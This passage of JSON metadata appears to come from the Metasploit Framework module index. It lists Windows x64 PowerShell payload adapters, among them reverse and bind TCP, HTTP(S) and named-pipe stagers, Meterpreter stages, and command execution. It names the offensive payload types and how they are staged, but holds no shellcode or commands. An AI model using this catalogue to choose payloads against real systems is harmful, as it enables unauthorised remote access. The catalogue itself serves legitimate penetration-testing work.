"fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_http": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/powershell/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_http", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_https": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_https", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_named_pipe": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 
300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_tcp_rc4": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", 
- "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_winhttp": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_winhttps": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/powershell/x64/encrypted_shell/reverse_tcp": { - "name": "Powershell Exec, Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Execute an x64 payload from a command via 
PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/exec": { - "name": "Powershell Exec, Windows x64 Execute Command", - "fullname": "payload/cmd/windows/powershell/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nExecute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/exec", - "staged": false - }, - "payload_cmd/windows/powershell/x64/loadlibrary": { - "name": "Powershell Exec, Windows x64 LoadLibrary 
Path", - "fullname": "payload/cmd/windows/powershell/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "scriptjunkie", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nLoad an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/loadlibrary", - "staged": false - }, - "payload_cmd/windows/powershell/x64/messagebox": { - "name": "Powershell Exec, Windows MessageBox x64", - "fullname": "payload/cmd/windows/powershell/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "pasta " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": 
"windows/x64/messagebox", - "staged": false - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - 
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_named_pipe": { - "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp": { - "name": "Powershell Exec, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - 
"mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_http": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_https": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": 
"payload/cmd/windows/powershell/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_named_pipe": { - "name": "Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp": { - "name": "Powershell Exec, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - 
"stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows 
